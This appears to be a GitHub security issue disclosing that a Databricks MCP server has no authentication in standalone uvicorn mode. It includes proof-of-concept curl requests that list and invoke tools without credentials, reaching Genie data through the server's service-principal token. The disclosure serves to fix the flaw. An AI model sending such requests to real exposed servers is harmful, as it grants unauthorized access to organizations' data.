Missing Authentication Enforcement in Databricks MCP Server (Standalone Deployment) #49

@osamahamad01

Description

The FastAPI application serving Unity Catalog tools, Genie queries, and vector search has zero authentication middleware. The README and the built-in landing page both instruct clients to set Authorization: Bearer <token>, but the server never validates that header. When deployed standalone via uvicorn (a documented deployment path), any network-adjacent caller can invoke all registered MCP tools without credentials. Those tools execute against Databricks using the server's own service principal token, giving the unauthenticated caller indirect access to whatever the SP can reach: UC functions, Genie conversations, SQL query execution, and vector search indexes.

Step 1 -- Clone and install.

git clone https://github.com/databrickslabs/mcp.git /tmp/poc/mcp
cd /tmp/poc/mcp
uv sync

Step 2 -- Configure the server's SP credentials.

export DATABRICKS_HOST="https://your-workspace.cloud.databricks.com"
export DATABRICKS_TOKEN="dapi_your_service_principal_token"
export SCHEMA_FULL_NAME="catalog.schema"

Step 3 -- Start the server in standalone HTTP mode.

uv run uvicorn databricks.labs.mcp.servers.unity_catalog.app:app --host 0.0.0.0 --port 8000

Step 4 -- From another machine on the network, list tools without any Authorization header.

curl -s -X POST http://<server-ip>:8000/api/mcp/ \
  -H "Content-Type: application/json" \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' \
  | python3 -m json.tool

Step 5 -- Call a tool without any Authorization header.

curl -s -X POST http://<server-ip>:8000/api/mcp/ \
  -H "Content-Type: application/json" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"genie_list_spaces","arguments":{}}}' \
  | python3 -m json.tool

What you observe. Step 4 returns a JSON-RPC response listing all registered tools (UC functions, vector search indexes, Genie tools). Step 5 returns data from the Genie API, fetched using the server's SP token. Neither request included an Authorization header.
